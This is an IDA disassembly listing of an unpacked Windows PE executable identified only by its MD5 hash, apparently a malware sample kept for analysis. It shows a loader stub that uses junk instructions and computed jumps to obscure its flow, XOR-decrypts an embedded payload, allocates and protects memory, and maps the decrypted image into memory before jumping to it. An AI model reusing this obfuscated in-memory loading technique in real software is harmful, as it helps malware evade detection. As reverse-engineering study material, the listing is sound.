;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : B3FD1B8F9B34D7F7EF8D14E2CE6283B1
; File Name : u:\work\b3fd1b8f9b34d7f7ef8d14e2ce6283b1_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000029E ( 670.)
; Section size in file : 0000029E ( 670.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
dword_401000 dd 7C8300DAh ; resolved to->KERNEL32.CancelIodword_401004 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_401008 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_40100C dd 7C80B6A1h, 7C802442h, 7C809A51h, 7C801AD0h, 7C85E6DAh
; resolved to->KERNEL32.GetModuleHandleA ; DATA XREF: .text:00401096�r
; .text:00401108�r ...
dd 4 dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
mov eax, eax
sub esp, 1Bh
dec esp
mov ebx, esp
call dword_401004 ; GetFileSize
mov esp, ebx
call dword_401008 ; RtlGetLastWin32Error
add eax, 40104Ah
jmp eax
start endp
; ---------------------------------------------------------------------------
push 2000h
pop dword ptr [ebp-14h]
mov dword ptr [ebp-0Ch], 1AF62DE9h
mov dword ptr [ebp-8], 1A5BAC89h
mov ebx, esp
call dword_40100C+10h
mov esp, ebx
call dword_401008 ; RtlGetLastWin32Error
add eax, 401026h
jmp eax
; ---------------------------------------------------------------------------
mov ebx, esp
call dword_401000 ; CancelIo
mov esp, ebx
call dword_401008 ; RtlGetLastWin32Error
mov dword ptr [ebp-4], 6
push 0
call dword_40100C ; GetModuleHandleA
add eax, [ebp-14h]
push dword ptr [eax+74h]
pop dword ptr [ebp-10h]
lea eax, [eax+86h]
add eax, 2
mov [ebp-14h], eax
push 0
push 4
push dword ptr [ebp-10h]
push dword ptr [ebp-14h]
call dword_40100C+0Ch
xor ecx, ecx
add ecx, [ebp-10h]
mov ebx, [ebp-14h]
mov eax, [ebp-0Ch]
add eax, [ebp-4]
loc_4010CF: ; CODE XREF: .text:004010DE�j
xor [ebx], eax
sub ecx, 2
dec ecx
dec ecx
jl short loc_4010E0
add eax, [ebp-8]
add ebx, 4
jmp short loc_4010CF
; ---------------------------------------------------------------------------
loc_4010E0: ; CODE XREF: .text:004010D6�j
xor eax, eax
mov ebx, [ebp-14h]
mov esi, ebx
mov ebx, [ebx+3Ch]
add ebx, esi
mov al, [ebx+6]
mov [ebp-18h], eax
push 40h
push 3000h
push dword ptr [ebx+50h]
push dword ptr [ebx+34h]
call dword_40100C+8
push eax
push 0
call dword_40100C+4
pop eax
mov [ebp-4], eax
push eax
push dword ptr [ebp-14h]
push dword ptr [ebx+54h]
call sub_401176
lea esi, [ebx+0F8h]
loc_401124: ; CODE XREF: .text:00401145�j
mov ecx, [ebp-4]
add ecx, [esi+0Ch]
push ecx
mov eax, [ebp-14h]
mov ecx, 14h
add eax, [ecx+esi]
push eax
push dword ptr [esi+10h]
call sub_401176
add esi, 28h
dec dword ptr [ebp-18h]
jnz short loc_401124
mov eax, [ebx+28h]
add eax, [ebp-4]
mov [ebp+4], eax
mov ecx, 3DAB0A2Fh
add ecx, 6D10C2AEh
mov eax, [ebp-4]
loc_40115E: ; CODE XREF: .text:00401163�j
add eax, 4
cmp [eax], ecx
jnz short loc_40115E
push eax
lea eax, dword_401194
push eax
push 38h
call sub_401176
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401176 proc near ; CODE XREF: .text:00401119�p
; .text:0040113A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
mov ecx, [ebp+arg_0]
loc_401184: ; CODE XREF: sub_401176+15�j
mov al, [esi]
mov [edi], al
inc esi
inc edi
dec ecx
jnz short loc_401184
pop edi
pop esi
leave
retn 0Ch
sub_401176 endp
; ---------------------------------------------------------------------------
align 4
dword_401194 dd 0AABBCCDDh, 15Ah, 0; ---------------------------------------------------------------------------
push ds
add al, 0
add al, dl
inc edx
retn
; ---------------------------------------------------------------------------
db 0Fh
dd 47C342D0h, 5071E842h, 12D77E4Bh, 924DAAD9h, 0E8C242D0h
dd 0E3C242D0h, 0F0C242D0h, 2 dup(0)
dd 11F4h, 2 dup(0)
db 90h
db 12h, 2 dup(0)
dd 1000h, 5 dup(0)
dd 1218h, 1224h, 1232h, 1242h, 1256h, 125Eh, 126Eh, 1280h
dd 0
dd 61430027h, 6C65636Eh, 6F49h, 6547015Bh, 6C694674h, 7A695365h
dd 1680065h, 4C746547h, 45747361h, 726F7272h, 1750000h
dd 4D746547h, 6C75646Fh, 6E614865h, 41656C64h, 33E0000h
dd 65656C53h, 36A0070h, 74726956h, 416C6175h, 636F6C6Ch
dd 3700000h, 74726956h, 506C6175h, 65746F72h, 7463h, 69560374h
dd 61757472h, 6C6E556Ch, 6B636Fh, 4E52454Bh, 32334C45h
dd 6C6C642Eh
db 2 dup(0)
_text ends
; Section 3. (virtual address 00005000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00004600
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 405000h
align 2000h
_idata2 ends
end start